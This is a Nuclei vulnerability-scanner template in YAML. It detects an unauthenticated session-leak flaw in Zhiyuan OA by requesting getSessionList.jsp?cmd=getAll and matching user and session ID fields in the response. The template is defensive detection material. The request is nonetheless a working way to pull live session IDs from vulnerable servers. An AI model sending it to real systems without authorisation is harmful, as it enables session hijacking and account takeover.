nuclei-templates/vulnerabilities/other/zhiyuan-oa-session-leak.yaml

28 lines
656 B
YAML

id: zhiyuan-oa-session-leak
info:
name: Zhiyuan OA Session Leak
author: pikpikcu
severity: medium
description: A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint.
reference: https://www.zhihuifly.com/t/topic/3345
tags: zhiyuan,leak,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/yyoa/ext/https/getSessionList.jsp?cmd=getAll"
matchers-condition: and
matchers:
- type: word
words:
- "<usrID>"
- "<sessionID>"
condition: and
- type: status
status:
- 200